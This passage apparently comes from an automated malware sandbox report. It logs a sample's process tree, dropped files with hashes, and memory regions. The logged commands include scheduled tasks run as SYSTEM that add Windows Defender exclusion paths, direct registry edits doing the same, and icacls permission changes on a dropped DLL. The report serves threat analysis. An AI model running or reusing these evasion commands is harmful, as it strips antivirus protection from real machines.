                                                          cmd.exe /c icacls "C:\Program Files (x86)\gu8Jvs\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                                          3⤵
                                                          • Executes a command shell one-liner
                                                          PID:4848
                                                          • C:\Windows\SysWOW64\icacls.exe
                                                            icacls "C:\Program Files (x86)\gu8Jvs\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                                            4⤵
                                                            • Possible privilege escalation attempt
                                                            • Modifies file permissions
                                                            PID:1212
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                          3⤵
                                                          • Indicator Removal: Clear Persistence
                                                          PID:3180
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                            4⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:4600
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            SCHTASKS /Run /TN "Task1"
                                                            4⤵
                                                              PID:2112
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              SCHTASKS /Delete /TN "Task1" /F
                                                              4⤵
                                                                PID:3392
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                              3⤵
                                                              • Indicator Removal: Clear Persistence
                                                              PID:2456
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                                                4⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:1504
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                SCHTASKS /Run /TN "Task1"
                                                                4⤵
                                                                  PID:896
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  SCHTASKS /Delete /TN "Task1" /F
                                                                  4⤵
                                                                    PID:1376
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                  3⤵
                                                                  • Indicator Removal: Clear Persistence
                                                                  PID:5376
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                                                    4⤵
                                                                    • Scheduled Task/Job: Scheduled Task
                                                                    PID:5260
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    SCHTASKS /Run /TN "Task1"
                                                                    4⤵
                                                                      PID:1664
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      SCHTASKS /Delete /TN "Task1" /F
                                                                      4⤵
                                                                        PID:4700
                                                                • C:\Windows\system32\cmd.exe
                                                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\xw5wUp" /t REG_DWORD /d 0 /f
                                                                  1⤵
                                                                  • Executes a command shell one-liner
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:5732
                                                                  • C:\Windows\System32\reg.exe
                                                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\xw5wUp" /t REG_DWORD /d 0 /f
                                                                    2⤵
                                                                    • Windows security bypass
                                                                    PID:52
                                                                • C:\Windows\system32\cmd.exe
                                                                  cmd.exe
                                                                  1⤵
                                                                    PID:3404
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                    1⤵
                                                                    • Executes a command shell one-liner
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:5252
                                                                    • C:\Windows\System32\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                      2⤵
                                                                      • Windows security bypass
                                                                      PID:120
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                    1⤵
                                                                    • Executes a command shell one-liner
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:4592
                                                                    • C:\Windows\System32\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                      2⤵
                                                                      • Windows security bypass
                                                                      PID:244
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                    1⤵
                                                                    • Executes a command shell one-liner
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:4892
                                                                    • C:\Windows\System32\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                      2⤵
                                                                      • Windows security bypass
                                                                      PID:5260
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                                    1⤵
                                                                    • Executes a command shell one-liner
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1536
                                                                    • C:\Windows\System32\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                                      2⤵
                                                                      • Windows security bypass
                                                                      PID:4700
                                                                  • C:\Program Files (x86)\gu8Jvs\gu8Jvs.exe
                                                                    "C:\Program Files (x86)\gu8Jvs\gu8Jvs.exe"
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5528
                                                                  • C:\Program Files (x86)\IOqdLm6\FHK2xKI2.exe
                                                                    "C:\Program Files (x86)\IOqdLm6\FHK2xKI2.exe"
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:4776
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\gu8Jvs" /t REG_DWORD /d 0 /f
                                                                    1⤵
                                                                    • Executes a command shell one-liner
                                                                    PID:1368
                                                                    • C:\Windows\System32\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\gu8Jvs" /t REG_DWORD /d 0 /f
                                                                      2⤵
                                                                        PID:2948
                                                                    • C:\Windows\system32\cmd.exe
                                                                      "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                      1⤵
                                                                      • Executes a command shell one-liner
                                                                      PID:4388
                                                                      • C:\Windows\System32\reg.exe
                                                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                        2⤵
                                                                          PID:1880
                                                                      • C:\Windows\system32\cmd.exe
                                                                        "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                        1⤵
                                                                        • Executes a command shell one-liner
                                                                        PID:3840
                                                                        • C:\Windows\System32\reg.exe
                                                                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                          2⤵
                                                                            PID:5624
                                                                        • C:\Windows\system32\cmd.exe
                                                                          "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                                          1⤵
                                                                          • Executes a command shell one-liner
                                                                          PID:3664
                                                                          • C:\Windows\System32\reg.exe
                                                                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                                            2⤵
                                                                              PID:468

                                                                          Network

                                                                                MITRE ATT&CK Enterprise v16

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads

                                                                                e5975a4.rbs

                                                                                • Path C:\Config.Msi\e5975a4.rbs
                                                                                • Size 7KB
                                                                                • SHA256 de16257c1b676a7b09ce3ece5dac470c8467c7b202a26ef21951a1714f6071ad
                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                XPSPLOG.dll

                                                                                • Path C:\Program Files (x86)\IOqdLm6\XPSPLOG.dll
                                                                                • Size 4.6MB
                                                                                • SHA256 f32cd0037ada30e84dee625a82b967fa028a0b1612f9c93d80bdb36f9733c3be
                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                image.png

                                                                                • Path C:\Program Files (x86)\IOqdLm6\image.png
                                                                                • Size 5.0MB
                                                                                • SHA256 a54f0782f1d6ad136b919b3778e3668ede3e48d557ed9a551e443abcc33e9434
                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                XPSPLOG.dll

                                                                                • Path C:\Program Files (x86)\gu8Jvs\XPSPLOG.dll
                                                                                • Size 4.6MB
                                                                                • SHA256 77cc464e03555e65f581841a015ebd3a519b4e4d1f0276f7b271a37a86811de3
                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                gu8Jvs.exe

                                                                                • Path C:\Program Files (x86)\gu8Jvs\gu8Jvs.exe
                                                                                • Size 145KB
                                                                                • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                image.png

                                                                                • Path C:\Program Files (x86)\gu8Jvs\image.png
                                                                                • Size 5.0MB
                                                                                • SHA256 0a547f4fa720216c35f16cbed939cd120e2624a773408a5985a620b91f0c26ce
                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                thumbs.db

                                                                                • Path C:\Program Files (x86)\gu8Jvs\thumbs.db
                                                                                • Size 358KB
                                                                                • SHA256 c3bd67ac05639c106acedc94c06db061783c1f56473ea54b1754e52cada93052
                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                StartupProfileData-NonInteractive

                                                                                • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                • Size 1KB
                                                                                • SHA256 29ed6471046e77d869bd03e7a84f454a8340cf5dd7b3653650872ab4ef865934
                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                __PSScriptPolicyTest_cyhyg0n4.2yd.ps1

                                                                                • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cyhyg0n4.2yd.ps1
                                                                                • Size 60B
                                                                                • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                destopbak.ini

                                                                                • Path C:\Users\Public\Music\destopbak.ini
                                                                                • Size 2B
                                                                                • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                                                                • MD5 SHA1 SHA512

                                                                                UxEnhance64.dll

                                                                                • Path C:\Users\Public\xw5wUp\UxEnhance64.dll
                                                                                • Size 3.1MB
                                                                                • SHA256 290ae56c369226104c31d0a5b17173552274896f2a6bbe1b5eaa44485660a4e1
                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                aZMwMQ.exe

                                                                                • Path C:\Users\Public\xw5wUp\aZMwMQ.exe
                                                                                • Size 135KB
                                                                                • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                adoresd.dat

                                                                                • Path C:\Users\Public\xw5wUp\adoresd.dat
                                                                                • Size 4.7MB
                                                                                • SHA256 3ae71a21e975a02a70b71ada37b3f82c8d3febe08c652f3829c4837bc3b6b27c
                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                msadox.tb

                                                                                • Path C:\Users\Public\xw5wUp\msadox.tb
                                                                                • Size 8KB
                                                                                • SHA256 c769a38353ac67936820211eea40745011591de4783e8bc28da0fe449c5a1664
                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                MSI7E20.tmp

                                                                                • Path C:\Windows\Installer\MSI7E20.tmp
                                                                                • Size 9.1MB
                                                                                • SHA256 167a9ca80e35ef23731eb829b612b26a9deee4710a227f60ff37655fa01330fe
                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                e5975a3.msi

                                                                                • Path C:\Windows\Installer\e5975a3.msi
                                                                                • Size 9.2MB
                                                                                • SHA256 6427b9d4f3e73d7d9f121d0c56be6abc7b068830762a1441fe25a47c603a2127
                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                metadata-2

                                                                                • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                                                                • Size 26.1MB
                                                                                • SHA256 59a28e6d9197030e89ed1ccc2bbfb7f903ea0fe80de169bb8faaf6492ded908e
                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                {f0362d1d-3cf8-4640-99cf-7a4f9d3db0a2}_OnDiskSnapshotProp

                                                                                • Path \??\Volume{c576ab2f-0000-0000-0000-d08302000000}\System Volume Information\SPP\OnlineMetadataCache\{f0362d1d-3cf8-4640-99cf-7a4f9d3db0a2}_OnDiskSnapshotProp
                                                                                • Size 6KB
                                                                                • SHA256 ed379955c347928b1448bb94ad834a442dd526308e0f151d2d113b196f77f89f
                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                xxxx.ini

                                                                                • Path \??\c:\xxxx.ini
                                                                                • Size 2B
                                                                                • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                                                                • MD5 SHA1 SHA512

                                                                                memory/1408-208-0x00000000036D0000-0x0000000003ED7000-memory.dmp

                                                                                memory/1408-237-0x00000000036D0000-0x0000000003ED7000-memory.dmp

                                                                                memory/1408-218-0x00000000036D0000-0x0000000003ED7000-memory.dmp

                                                                                memory/1408-200-0x0000000004C80000-0x0000000004C94000-memory.dmp

                                                                                memory/1408-193-0x00000000036D0000-0x0000000003ED7000-memory.dmp

                                                                                memory/1408-225-0x0000000010000000-0x0000000010061000-memory.dmp

                                                                                memory/1408-189-0x00000000036D0000-0x0000000003ED7000-memory.dmp

                                                                                memory/1408-188-0x0000000003EE0000-0x0000000003EE1000-memory.dmp

                                                                                memory/1408-186-0x00000000036D0000-0x0000000003ED7000-memory.dmp

                                                                                memory/1408-201-0x00000000036D0000-0x0000000003ED7000-memory.dmp

                                                                                memory/1408-183-0x0000000074F30000-0x000000007567A000-memory.dmp

                                                                                memory/1408-181-0x0000000001560000-0x0000000001561000-memory.dmp

                                                                                memory/1408-264-0x00000000036D0000-0x0000000003ED7000-memory.dmp

                                                                                memory/1476-100-0x0000015E69210000-0x0000015E6922E000-memory.dmp

                                                                                memory/1476-101-0x0000015E694D0000-0x0000015E69582000-memory.dmp

                                                                                memory/1476-102-0x0000015E69230000-0x0000015E6923A000-memory.dmp

                                                                                memory/1476-97-0x0000015E691B0000-0x0000015E691D2000-memory.dmp

                                                                                memory/1620-71-0x000001F779550000-0x000001F779DE1000-memory.dmp

                                                                                memory/1620-55-0x00007FFC00170000-0x00007FFC00172000-memory.dmp

                                                                                memory/1620-90-0x000001F779550000-0x000001F779DE1000-memory.dmp

                                                                                memory/1620-88-0x000001F779550000-0x000001F779DE1000-memory.dmp

                                                                                memory/1620-85-0x000001F779F50000-0x000001F779FDA000-memory.dmp

                                                                                memory/1620-83-0x000001F779F50000-0x000001F779FDA000-memory.dmp

                                                                                memory/1620-86-0x000001F779F50000-0x000001F779FDA000-memory.dmp

                                                                                memory/1620-84-0x000001F779F50000-0x000001F779FDA000-memory.dmp

                                                                                memory/1620-81-0x000001F779E50000-0x000001F779E9E000-memory.dmp

                                                                                memory/1620-75-0x000001F779550000-0x000001F779DE1000-memory.dmp

                                                                                memory/1620-70-0x000001F779550000-0x000001F779DE1000-memory.dmp

                                                                                memory/1620-69-0x000001F779550000-0x000001F779DE1000-memory.dmp

                                                                                memory/1620-64-0x000001F779550000-0x000001F779DE1000-memory.dmp

                                                                                memory/1620-68-0x000001F779550000-0x000001F779DE1000-memory.dmp

                                                                                memory/1620-63-0x00007FFC00180000-0x00007FFC00182000-memory.dmp

                                                                                memory/1620-61-0x000001F779550000-0x000001F779DE1000-memory.dmp

                                                                                memory/1620-56-0x00007FFBDCCC0000-0x00007FFBDD1DE000-memory.dmp

                                                                                memory/1620-91-0x000001F779550000-0x000001F779DE1000-memory.dmp

                                                                                memory/3288-16-0x00007FFBEBA40000-0x00007FFBEBA52000-memory.dmp

                                                                                memory/3288-12-0x00007FFC00170000-0x00007FFC00172000-memory.dmp

                                                                                memory/3288-38-0x00007FFBEBA40000-0x00007FFBEBA52000-memory.dmp

                                                                                memory/3288-13-0x00007FFBDCBA0000-0x00007FFBDD1D3000-memory.dmp

                                                                                memory/4160-262-0x0000000005CE0000-0x000000000632A000-memory.dmp

                                                                                memory/4160-291-0x0000000007D80000-0x0000000007D8A000-memory.dmp

                                                                                memory/4160-293-0x0000000007F00000-0x0000000007F11000-memory.dmp

                                                                                memory/4160-288-0x0000000007C00000-0x0000000007CA3000-memory.dmp

                                                                                memory/4160-259-0x0000000003500000-0x0000000003536000-memory.dmp

                                                                                memory/4160-287-0x0000000006F90000-0x0000000006FB0000-memory.dmp

                                                                                memory/4160-292-0x0000000007F80000-0x0000000008016000-memory.dmp

                                                                                memory/4160-284-0x0000000073C10000-0x0000000073C5C000-memory.dmp

                                                                                memory/4160-290-0x0000000007D10000-0x0000000007D2A000-memory.dmp

                                                                                memory/4160-289-0x0000000008350000-0x00000000089CC000-memory.dmp

                                                                                memory/4160-266-0x0000000006330000-0x0000000006352000-memory.dmp

                                                                                memory/4160-270-0x0000000006550000-0x00000000065B6000-memory.dmp

                                                                                memory/4160-269-0x00000000063D0000-0x0000000006436000-memory.dmp

                                                                                memory/4160-271-0x00000000065C0000-0x000000000691B000-memory.dmp

                                                                                memory/4160-280-0x00000000069B0000-0x00000000069CE000-memory.dmp

                                                                                memory/4160-283-0x0000000007BC0000-0x0000000007BF6000-memory.dmp

                                                                                memory/4160-281-0x0000000006F40000-0x0000000006F8C000-memory.dmp

                                                                                memory/4776-254-0x0000000003410000-0x0000000003C17000-memory.dmp

                                                                                memory/4776-279-0x0000000000FC0000-0x0000000000FC1000-memory.dmp

                                                                                memory/4776-274-0x0000000003410000-0x0000000003C17000-memory.dmp

                                                                                memory/4776-273-0x0000000000FE0000-0x0000000000FE1000-memory.dmp

                                                                                memory/4776-249-0x0000000000FC0000-0x0000000000FC1000-memory.dmp

                                                                                memory/4776-250-0x00000000735A0000-0x0000000073CEA000-memory.dmp

                                                                                memory/5528-263-0x0000000002710000-0x0000000002711000-memory.dmp

                                                                                memory/5528-258-0x0000000003510000-0x0000000003D17000-memory.dmp

                                                                                memory/5528-257-0x0000000002730000-0x0000000002731000-memory.dmp

                                                                                memory/5528-247-0x0000000003510000-0x0000000003D17000-memory.dmp

                                                                                memory/5528-238-0x0000000002710000-0x0000000002711000-memory.dmp

                                                                                memory/5528-239-0x0000000074F30000-0x000000007567A000-memory.dmp